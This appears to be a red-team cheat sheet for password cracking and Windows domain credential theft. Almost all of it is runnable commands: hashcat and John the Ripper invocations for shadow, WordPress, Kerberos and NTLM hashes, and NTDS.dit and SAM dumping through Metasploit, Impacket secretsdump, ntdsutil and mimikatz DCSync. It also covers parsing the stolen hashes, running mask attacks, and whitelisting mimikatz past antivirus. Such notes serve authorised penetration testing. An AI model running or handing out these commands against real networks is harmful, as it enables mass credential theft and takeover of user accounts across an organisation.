Password cracking
Hash identifier
hash-identifier
Online cracking (CTF only)
https://hashkiller.co.uk/ https://crackstation.net/ https://www.onlinehashcrack.com/ http://cracker.offensive-security.com/ https://md5decrypt.net/en/ https://www.cmd5.org/ https://crack.sh/ https://gpuhash.me/ https://hash.help/ https://passwordrecovery.io/
CEWL
cewl <domain> -m 6 -w <out>
JtR
john --format=md5crypt unshadowed
auxiliary/analyze/jtr_crack_fast
kerberoasting
john <krb.txt> --wordlist=</usr/share/wordlists/rockyou.txt>
Hashcat and Hashes
Hashcat SHA512 $6$ shadow file
hashcat -m 1800 -a 0 hash.txt rockyou.txt --username
Hashcat MD5 $1$ shadow file
hashcat -m 500 -a 0 hash.txt rockyou.txt --username
Hashcat MD5 Apache webdav file
hashcat -m 1600 -a 0 hash.txt rockyou.txt
Hashcat SHA1
hashcat -m 100 -a 0 hash.txt rockyou.txt
Hashcat Wordpress
hashcat -m 400 -a 0 hash.txt rockyou.txt
Hashcat Kerberoasting
hashcat -m 13100 -a 0 hash.txt rockyou.txt
Crack SSH private key
Proc-Type: 4,ENCRYPTED
/opt/ssh2john.py id_rsa > id_john
john id_john --wordlist=</usr/share/wordlists/rockyou.txt>
Dump NTLM passwords
use windows/gather/credentials/domain_hashdump
Alternatives methods
use auxiliary/admin/smb/psexec_ntdsgrab
Hashdump / smarthashdump (unsafe for big AD)
Mimikatz Module:
lsadump::lsa /inject [/name:krbtgt] (unsafe)
Impacket
impacket-secretsdump <fqdn_domain>/<da_account>:'<password>'@<DC_ip> -just-dc
Ntdutil (Need a copy of SAM and SYSTEM too)
ntdsutil
activate instance ntdsqifm
create full C:\ntdsutil
quit
quit
Dump
./adXtract.sh /root/ntds.dit /root/SYSTEM <projectname>
NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive
Parsing
From Cobalt Strike export
cat credentials.txt | grep ":::" | grep -i <fqdn_domain> | awk -F "\\" '{print $2}' | sed 's/:::/:/' | sed 's/::://' > <fqdn_domain>.hashes
From impacket-secretdump
grep '.*:.*:.*:.*:::' <impacket.hashes> | cut -d ':' -f1,4 | grep -v '\$' > <domain.hashes>
From MSF
db_export -f pwdump <mission.pwdump>
grep '.*:.*:.*:.*:::' mission.pwdump > mission.hashes
From ntds.dit + SYSTEM
secretsdump.py -ntds <ntds.dit> -system <SYSTEM> LOCAL | grep '.*:.*:.*:.*:::' | cut -d ":" -f 1,4 > /tmp/ntds.hash
git clone https://github.com/HarmJ0y/ImpDump /opt/Impdump
cd /opt/Impdump
chmod +x setup.sh
./setup.sh
/opt/Impdump/extract.sh <NTDS.dit> > /tmp/ntds.raw
/opt/Impdump/impdump.py <SYSTEM> /tmp/ntds.raw | cut -d ":" -f 1,4 > /tmp/ntds.hash
DCSync extraction method
Prerequisites
- Domain Account with
Replicating Directory Changes
andReplicating Directory Changes All
permissions. By default, this is limited to theDomain Admins
,Enterprise Admins
,Administrators
, andDomain Controllers
groups. - Being connected with this account on any Domain tied system (server or workstation), it is not necessary to be on the domain controller itself.
- Access powershell on the system
- Download the latest mimikatz release
- Extract the archive and whitelist the binaries in the Antivirus/Applocker if necessary.
- Download Secure Delete from sysinternals
Extraction
Check your system architecture and choose mimikatz version accordingly (32 or 64 bits) Check by typing the following command and check “System Type” line
C:\>systeminfo | findstr "System"
System Boot Time: 01-01-1970, 00:00:00
System Manufacturer: Some manufacturer
System Model: Some model
System Type: x64-based PC
System Directory: C:\WINDOWS\system32
System Locale: fr-be;French (Belgium)
In mimikatz prompt type the following commands (one by one)
log C:\mimikatz.log
lsadump::dcsync /all /csv
exit
Open the mimikatz logfile and remove all lines not correspoding to dcsync output
All remaining data should have this format userID username ntlmhash
save and close the logfile
Parsing
Parse hashes with hashcat
syntax a store it in C:\ntlm.hash
Get-Content C:\mimikatz.log | ForEach-Object { $_ -replace "\s+",":" } | ForEach-Object { $_.split(":")[1:2] -join ":" }| Out-File C:\ntlm.hash
Cleanup
Password cracking NTLM (domain)
With a CrackStation
TO DO
Without a CrackStation
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\rockyou.txt -r rules\best64.rule
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\rockyou.txt -r rules\d3*
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\realuniq.lst -r rules\best64.rule
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\small\* -r rules\*
hashcat64.exe -a 3 -m 1000 --potfile-path results\out.pot --username hashes\domain.out ?a?a?a?a?a?a -i
hashcat64.exe -a 3 -m 1000 --potfile-path results\out.pot --username hashes\domain.out -1 ?l?d -2 ?d?s ?u?l?l?l?l?1?1?2?2
hashcat64.exe -a 3 -m 1000 --potfile-path results\out.pot --username hashes\domain.out ?d?d?d?d?d?d?d?d?d?d?d?d -i
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\rockyou.txt -r rules\efensive.rule
Common masks
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?l?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?d?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?d?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?l?l?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?l?d?s
Custom dictionnary
1) Reuse cracked password
2) Establish patterns to perfom mask attacks